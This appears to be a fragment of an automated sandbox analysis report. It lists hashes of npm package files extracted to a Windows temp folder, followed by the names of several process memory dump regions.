SHA256 742bd2d12a7786e595955c8a846dbefe88591df39c2659491bddadbb8ed7dae6
SHA512 ddbb842e803e1f170adf8ef41e209eb2cd0b857f2605e816ebefae3f4c9bc40f70a4fb1b32fbfeed04ed2465d8d19be573a3958df51df7503817766a705a9de4

C:\Users\Admin\AppData\Local\Temp\7zS6B5C.tmp\node_modules\gauge\lib\plumbing.js

MD5 ea9b89a82c6935dd42f43f4a91cd4b3e
SHA1 ced271efe695d542670cc84c98435590956d97e8
SHA256 1e7982a4080950347c5c4a33c6a4e7e6e5a6c0ae0e0fb87301e62b48fc3a75f1
SHA512 2d47928ddcb872fb0336ee5fac0389dbbf94a2a1148005783a67ae0cab9a2707f0beca660aaffb2383602f42e2d41f5bcf4b03924828613ab8e36c74e9a1f5f3

C:\Users\Admin\AppData\Local\Temp\7zS6B5C.tmp\node_modules\gauge\lib\has-color.js

MD5 12bdbddc59cab41a8daa15925d883576
SHA1 c98472fff9ca49b7df18eb1ff15d41cb0d2af64d
SHA256 bc77cc5732b948d7fe113b31ff78972d6ea336f8d15e8547542007657d41dc30
SHA512 087b2aa7b423b7f173096091b36cce6269df4d768ae80fe818044360114753d7f5d968ab8f1c0b3c8c130cbc45176ac7e6a9369325ffbad3e6b89c43c39a71c2

C:\Users\Admin\AppData\Local\Temp\7zS6B5C.tmp\node_modules\gauge\lib\error.js

MD5 528e2cb56f65929aa4376e585005f1a4
SHA1 04e38f90829460d150c24677f678be9c59a1986d
SHA256 2957dc2045a462606df224526d880fcc7a472bc992a74b0db9b23bf1984a9b20
SHA512 c49eee8427b3315ea6866f094c55db240b6d7d889a520cc3fb0400ecd25d59c064e9c137fb004f657b03d2f21be56c00fb7abef9e0ef2462d8b9ad75c112eb6d

C:\Users\Admin\AppData\Local\Temp\7zS6B5C.tmp\node_modules\gauge\lib\base-theme.js

MD5 c2d6986c3f109d0207dd06ba223cfb27
SHA1 24692c6c9557e081c53383fadb23dff2fc77233d
SHA256 7a6f7058c9f54eb3ee04ed5b3e4afad0f3abfd0b658a040e85ae8f4a455b1d5d
SHA512 782a011f8af385dc2db12d1ea5ae92923ba156b5068e095de507d433af27f1ab0dbf4f0a8b83a39a6890a58067dafa5e1e4efe030f1978329f93699ce1b910ed

C:\Users\Admin\AppData\Local\Temp\7zS6B5C.tmp\node_modules\emoji-regex\index.js

MD5 0438b0678667b951cf518a14560fa0b7
SHA1 e678799abbf2035d94ab0114ae0783b36a3e5994
SHA256 c56978800e47f095cfbfe96712b5e78d150d1f62e32bb4943675213fce481ef0
SHA512 75924c24968e298b1496170a66624b97a76a77fb4ce5968e7c097ad227401256752d9d28c8a1f84d313ce4b06f9dc9b20e3f75d81398c8951b45375ccb013e3e

C:\Users\Admin\AppData\Local\Temp\7zS6B5C.tmp\node_modules\emoji-regex\es2015\index.js

MD5 8f12b24a27ff5f2381a4a1568475eaba
SHA1 975c292ad2c1f09c53d0c9f53db5e66fd26fbbfb
SHA256 8718dea4d28647912918dba60545890dc10ae672bfb186b6ec0af3fc5e826137
SHA512 b70e68def6e8b15cdc9ef8bfa1326611c4bf83ad8ac461511c6af1ee2acdaa182ae9336e1f7f8c171c9931d36d5d9347542d364605d714c81a90032afedf52e5

C:\Users\Admin\AppData\Local\Temp\7zS6B5C.tmp\node_modules\diff\lib\index.es6.js

MD5 b0189fc844758ea7861a33d4cf3deaa2
SHA1 42b196484a16db7a66eeb56906ed26e2182799fb
SHA256 69694883a1ee6ef36c17144e2eb41e5d75b8c0f487cae980fd536bcab5960931
SHA512 46558e8dfabdbf10c92cc41358526b4d779a5e256303032cfbfaaa966d0283881fdd97380d494066efb210172eb5a6544d5906a29972db2feb9a79c5f972b6ed

C:\Users\Admin\AppData\Local\Temp\7zS6B5C.tmp\node_modules\node-gyp\node_modules\minipass\package.json

MD5 0073ff5b8b418f84c67edd912ffab39e
SHA1 f351144cafb23a2e78d442708fcbcfdcd4c5420f
SHA256 280af43113a60826e63a6bf79e115fdf5f89d5866f663cdde3d229640671cee1
SHA512 eaf4015aa2e5a705e85edf3761c0b23daf8232d71ce30c508832ab0ef45a0b211b2deef468ae4faaa52ec701a36f485a3e50d035373345267b9041f585a1b242

C:\Users\Admin\AppData\Local\Temp\7zS6B5C.tmp\node_modules\node-gyp\node_modules\readable-stream\LICENSE

MD5 a67a7926e54316d90c14f74f71080977
SHA1 d3622fac093fe1cbcb4d8e8d35801600b681fc45
SHA256 ec62dc96da0099b87f4511736c87309335527fb7031639493e06c95728dc8c54
SHA512 e61de704d5a76afd66b5d9b1c78f0a5afe9a846686ca2fb28c814a4a60dbe82a190ed4a6a2f31e09bf6d695b8ec178ebea9804593029c58c1b1bedd793324d13

C:\Users\Admin\AppData\Local\Temp\7zS6B5C.tmp\node_modules\node-gyp\node_modules\minipass\index.mjs

MD5 55a53ee6e25ac34ed76b06fb810f779d
SHA1 4fbbe5a6ebfb97649354be366f3fe10e790c6aae
SHA256 00610cfd77dad5aa627d77f31362d4ba0f0a7db96902caf15451c9c637dd8d9e
SHA512 9e4519bacbeff53b39e0e100d28e933624ce5d1847a456c388b66b74f24ed28ffca2fa4026a902b420c598e07b8981146c026a3bb5032253ee1fdbd2a3faf4fc

C:\Users\Admin\AppData\Local\Temp\7zS6B5C.tmp\node_modules\node-gyp\node_modules\minipass\index.js

MD5 439cbb62bb943197d075e274e10c2c03
SHA1 eb32092d134f2ade8c9d95a3850e5c394b2a83a5
SHA256 cada1f100f58d05055afead733ec4bdb743e1e3333ab0e899a24f50c88c20cce
SHA512 84e4018d39e0e99253b5e312a026b31f31146e18565fdc440caadfbd1b99acc1eac453fd3e951fab8d789da21a2b68d3159e9776a9a26d883f953f4858ca753a

C:\Users\Admin\AppData\Local\Temp\7zS6B5C.tmp\node_modules\node-gyp\node_modules\minimatch\package.json

MD5 9f31a54ef78d345b4d57907429129cd7
SHA1 497003d0b7f274dd0b3bc185a6ea60657933270d
SHA256 ab02f4767adc32c3ced28703bf7f5a57fee72b638b582850a647770d12e5dbe7
SHA512 24144b4624231200c7e50b47649fe94e048d5079b971c9888b6f044232db5e520d07e83c332df57adf578298934ae093888069ce408dd57c400426c9172d601b

C:\Users\Admin\AppData\Local\Temp\7zS6B5C.tmp\node_modules\node-gyp\node_modules\minimatch\minimatch.js

MD5 43855baa9189d8dd645c44afc4132ec1
SHA1 f21a6b3c6d1d71bb65e4e6e0af1bf1baba3a207e
SHA256 ebae64a212004e293fd7b536f33a2ca830452f71377f4b51fa0a0e9885ee6a93
SHA512 b67a9875c4c70c765c00e24d02ee807c22099c66ce1ce41ffca4f47d53deaae0c2c9a39e19eaa42a94c31b937888681f945da3704f3e6e1a3e0711bda00ad77f

C:\Users\Admin\AppData\Local\Temp\7zS6B5C.tmp\node_modules\strip-ansi\package.json

MD5 6a0c65b4bd6c6b9cd068e2232eef50d9
SHA1 892d549c672831716abe655f087946d2644f2852
SHA256 0130850b9da0584f54cc20d3dab6365c807e9436ac78e016d5009efa99bd0530
SHA512 724a1e498671494c22ba929060058b5539acd34b839d263c9058a07333cda543d5c77435a0a6f13f76adb2f32bb93fa2683f8089245dbc4c8815bde17168ebb7

C:\Users\Admin\AppData\Local\Temp\7zS6B5C.tmp\node_modules\strip-ansi\index.js

MD5 d2f059d0b9cfa91f1e899a4632d33da8
SHA1 ac06aab8c4ef70f9d2c18bbd0b2eb5ef0bb7c900
SHA256 bf37cd692bf030c2ec270945bc26aa8b19ad379fa5916f12304758f709ab0978
SHA512 0685ed108c20c84b3c0d4bf181318bf3f3ad6602de1b5bb71dc6a8d377575e974c42bcc14f5d72a244f06044bce8f81005c57ec2d246a513b6f196700a5010c2

C:\Users\Admin\AppData\Local\Temp\7zS6B5C.tmp\node_modules\string-width\package.json

MD5 9546c3afdec6c3ee9a51fbb9d614976f
SHA1 a5306c15bba6cb123d9f061ca85eb56576c6638f
SHA256 6457a02418f004fe5d3fbbb19c7cbcc1450a8b887ff9a471dc6985ac83a48d36
SHA512 3e43d7d656ee1029abd5dc6da827db81907d99d60031111d747eb9b7354145e0262c113a061fe343d4020a3cba41fafc620d7d9f27cd2d8035a2af32b7eeab9e

C:\Users\Admin\AppData\Local\Temp\7zS6B5C.tmp\node_modules\string-width\index.js

MD5 570a2a45ed08d4c933084c566cfa9766
SHA1 e2b122265bccc50b8965d79b07a559a51e74747c
SHA256 ed69ea4f757130e46dc48a0cc31beb6257e61a31c70936d82b8a3f02ffd64df5
SHA512 f0ad29fc99cb379e7bcb2995c18a55da9ada9852456e8da752ecc679e0caf3d0f989d558ba5f041bb02bc02fb88a8c2f8ae7f1a524a2a041b54ec5637c71c121

C:\Users\Admin\AppData\Local\Temp\7zS6B5C.tmp\node_modules\node-gyp\node_modules\lru-cache\index.js

MD5 bdad1024c21b5855277ad8c8896b2a79
SHA1 7424326d137f530ccf17aa06b9e78950021f2abf
SHA256 b5e2c99840bab65da50361f5d07352cbcbd600b4ca0b97cab11303be9d0da99e
SHA512 dd3767f5478195ff333b22ec73acebb21933a1061f366c1a5b7b8d74947d59832680afe8ab4f3b30877f3b3c7f53308e2a37b09a3f6f1542d9a61f43fff0c1f8

C:\Users\Admin\AppData\Local\Temp\7zS6B5C.tmp\node_modules\node-gyp\node_modules\glob\sync.js

MD5 04c59a035f41d0ec358f2a35079b4440
SHA1 82b1c855e4bfca820ecbed219649cd174b0c2f62
SHA256 0f61227f4b55297f1ad16798c53e6a6dd55d633856f153133716413b7c5f61ad
SHA512 2db70c0194a06647b424f0b7209afe7751633ed2ea1ff5c24969c41a2d5951e9d013c678bacc1fb300919d18f3a788dc5901f5776d1b620244a1c81fc4705621

C:\Users\Admin\AppData\Local\Temp\7zS6B5C.tmp\node_modules\node-gyp\node_modules\glob\package.json

MD5 f3dafd17154522e1916560c13533b2fc
SHA1 ec0700462dfce89024e67c0437eabca858407176
SHA256 b00b6d35eda6d4aa6893baf19e53b7d005019ed840e4fa116c926a532ec577cf
SHA512 8db9fb83b45df542d06f405ce500aec63e3b0ce356c3098c9c58f56fd4635fa1d016da6fa5da33b47631b7a004c8669d8281a430cecbfd8e37577c91230f367e

C:\Users\Admin\AppData\Local\Temp\7zS6B5C.tmp\node_modules\node-gyp\node_modules\glob\LICENSE

MD5 c727d36f28f2762b1011dd483aa1a191
SHA1 35325ce350b66f071997ac573a97eca7e2e4f558
SHA256 6236fa0b88a4a0cce3dda0367979491b2052b3c8d6b1c10b3668de083e86a7f0
SHA512 cd94f54627d93ea0c4bec5129d70b0a0453979bb9f527226312dd63aff58c62d8c5739990a476a60527c4c34fea23f7aa1aabb6bc006c40219222dbf04c8bfb0

C:\Users\Admin\AppData\Local\Temp\7zS6B5C.tmp\node_modules\node-gyp\node_modules\glob\glob.js

MD5 102835deed0aaa75740f60c41a4d4a7a
SHA1 7b624669f35601648f8300b45c3b3861bd9c7ef6
SHA256 b8f35657ca927593d0f9e1aae3a8cfe9c33c697bf3c5733c2f6727f25ae25be1
SHA512 7bd2d4fd10aa7426727d93322ee56ea5767c87fc3ad1d2620cc9288a9ef32678be9816c37a36713720d30a69468cb0e8b577db1affac217f55fb455f5db2e3c0

C:\Users\Admin\AppData\Local\Temp\7zS6B5C.tmp\node_modules\node-gyp\node_modules\glob\common.js

MD5 f2666e73a5bb8ee95d180ca20a95b49c
SHA1 4890b7b6c34bc659a38802851951da90baad085d
SHA256 b867e089ab5d4ab19a83e5b34da3dd7f4018fdf255fcacc681aab87d41dc77e8
SHA512 3f66338d84ec1d6ed874228927da9de0b89c2901764d5e57cb323f345bbc7e392f353399794c6a396219f17e522934eef63e27d1155190046c2119ed9a08c0c8

C:\Users\Admin\AppData\Local\Temp\7zS6B5C.tmp\node_modules\node-gyp\node_modules\brace-expansion\package.json

MD5 effd91994b1b7ddb8a33060ad4541e6a
SHA1 a3c20e6ee1cae1c72f9ac87e6f2d1fd2a4254b37
SHA256 62de2d264aad4f27c5cf09f3c6bebc2aa2cacb0a2aa23342c3cde3c2b3910b2e
SHA512 64fbfd022ad04771b999161fab553ffa7ae50812be94f8a944f99fef643b26d74b6f889c63dfb29b6f50a66e0f0c4d6702ce1d6e6f95540eb8ff2058ca589bbc

C:\Users\Admin\AppData\Local\Temp\7zS6B5C.tmp\node_modules\node-gyp\node_modules\brace-expansion\index.js

MD5 2e265baed5f4147160f144389684af9c
SHA1 a2f937621d39c20ce582f697c3e4273d1e14b2e0
SHA256 6bf9eee39229aa68ac3e6a71177c387c8321eff1f83242a35f3e7c35cb9eec1b
SHA512 044ebca50298a99635636da73aa30b2f1de64fc580dde3cad93a7017b663fa389723cda0760c5bc2ce3e99ae3d49cfac707188576171e565c3f22c578a7439fd

memory/4540-7643-0x0000000005A80000-0x0000000005CFF000-memory.dmp

memory/4540-7644-0x0000000005A80000-0x0000000005CFF000-memory.dmp

memory/1132-7649-0x00000000059E0000-0x0000000005C50000-memory.dmp

memory/1132-7646-0x00000000059E0000-0x0000000005C50000-memory.dmp

memory/3904-7645-0x000002059A960000-0x000002059B09B000-memory.dmp

memory/3904-7647-0x000002059A960000-0x000002059B09B000-memory.dmp

memory/4540-7651-0x0000000005A80000-0x0000000005CFF000-memory.dmp

memory/3904-7653-0x000002059A960000-0x000002059B09B000-memory.dmp

memory/1132-7655-0x00000000059E0000-0x0000000005C50000-memory.dmp

memory/3904-7659-0x000002059A960000-0x000002059B09B000-memory.dmp

memory/1132-7663-0x00000000059E0000-0x0000000005C50000-memory.dmp

memory/4540-7662-0x0000000005A80000-0x0000000005CFF000-memory.dmp

memory/3904-7664-0x000002059A960000-0x000002059B09B000-memory.dmp

memory/4540-7668-0x0000000005A80000-0x0000000005CFF000-memory.dmp

memory/3904-7671-0x000002059A960000-0x000002059B09B000-memory.dmp

memory/1132-7669-0x00000000059E0000-0x0000000005C50000-memory.dmp

memory/4540-7673-0x0000000005A80000-0x0000000005CFF000-memory.dmp

memory/3904-7678-0x000002059A960000-0x000002059B09B000-memory.dmp

memory/4540-7680-0x0000000005A80000-0x0000000005CFF000-memory.dmp

memory/1132-7682-0x00000000059E0000-0x0000000005C50000-memory.dmp

memory/3904-7683-0x000002059A960000-0x000002059B09B000-memory.dmp

memory/1132-7676-0x00000000059E0000-0x0000000005C50000-memory.dmp

memory/1132-7688-0x00000000059E0000-0x0000000005C50000-memory.dmp

memory/4540-7687-0x0000000005A80000-0x0000000005CFF000-memory.dmp

memory/1132-7694-0x00000000059E0000-0x0000000005C50000-memory.dmp

memory/4540-7693-0x0000000005A80000-0x0000000005CFF000-memory.dmp

memory/3904-7695-0x000002059A960000-0x000002059B09B000-memory.dmp

memory/4540-7699-0x0000000005A80000-0x0000000005CFF000-memory.dmp

memory/1132-7700-0x00000000059E0000-0x0000000005C50000-memory.dmp

memory/3904-7701-0x000002059A960000-0x000002059B09B000-memory.dmp

memory/1132-7706-0x00000000059E0000-0x0000000005C50000-memory.dmp

memory/4540-7705-0x0000000005A80000-0x0000000005CFF000-memory.dmp

memory/3904-7689-0x000002059A960000-0x000002059B09B000-memory.dmp

memory/4540-7657-0x0000000005A80000-0x0000000005CFF000-memory.dmp